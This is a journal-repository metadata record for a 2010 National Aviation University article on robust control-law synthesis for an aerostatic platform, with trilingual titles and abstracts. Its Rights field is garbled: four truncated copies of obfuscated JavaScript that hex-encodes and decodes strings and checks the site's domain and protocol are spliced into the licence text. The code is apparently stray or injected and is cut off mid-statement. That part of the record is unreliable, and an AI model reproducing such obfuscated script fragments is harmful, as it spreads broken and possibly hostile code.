Record Details

СИНТЕЗ ЗАКОНІВ КЕРУВАННЯ АЕРОСТАТОМ ПІД ДІЄЮ НЕСТРУКТУРОВАНИХ ЗБУРЕНЬ

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title СИНТЕЗ ЗАКОНІВ КЕРУВАННЯ АЕРОСТАТОМ ПІД ДІЄЮ НЕСТРУКТУРОВАНИХ ЗБУРЕНЬ
Synthesis of control laws, when aerostat is influenced by instructed disturbances
Cинтез законов управления аэростатом при воздействии неструктурированных возмущений
 
Creator Абрамович, О.О.; Національний авіаційний університет
Булавкіна, С.О.; Національний авіаційний університет
Надсадна, О.І.; Національний авіаційний університет
 
Subject аеростатична платформа; неструктуровані збурення; параметрична робастна оптимізація
aerostatic platform; parametric robust optimization; unstructured disturbance
аэростатическая платформа; параметрическая робастная оптимизация; неструктурированные возмущения
 
Description  Запропоновано метод дослідження впливу неструктурованої динаміки під час проведення параметричної робастної оптимізації дискретних систем керування, що ґрунтується на використанні теореми Харитонова та теореми про малий коефіцієнт підсилення. Наведено результати використання цього методу на прикладі дискретної системи керування бічним рухом аеростатичної платформи.
 Aerostatic platforms are perspective project for securing mobile communication. Robust system should be synthesized for stabilizing. It can function in the following wide disturbance range: stratosphere wind (structure disturbance), parametric disturbance (unstructured disturbance). One of the way to solve the task is a -many-model approach. The appraisal of discrete system stability, which are influenced by disturbances, was made by the Kharytonov theorem.
 Одним из наиболее эффективных решений достижения робастности систем управления одновременно с сохранением показателя качества в допустимых пределах является  − многомодельный поход. Использование предложенного метода оценки влияния неструктурированных параметрических возмущений на динамику дискретной системы управления с помощью теоремы Харитонова показано на примере дискретной системы управления боковым движением аэростатической платформы. Оценка предельной нормы неструктурированных возмущений позволяет сделать вывод о их несущественном влиянии на динамику системы.
 
Publisher National Aviation University
 
Contributor


 
Date 2010-01-01
 
Type


 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/1821
10.18372/2306-1472.42.1821
 
Source Proceedings of the National Aviation University; Том 42, № 1 (2010); 112-118
Вестник Национального авиационного университета; Том 42, № 1 (2010); 112-118
Вісник Національного Авіаційного Університету; Том 42, № 1 (2010); 112-118
 
Language ru
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ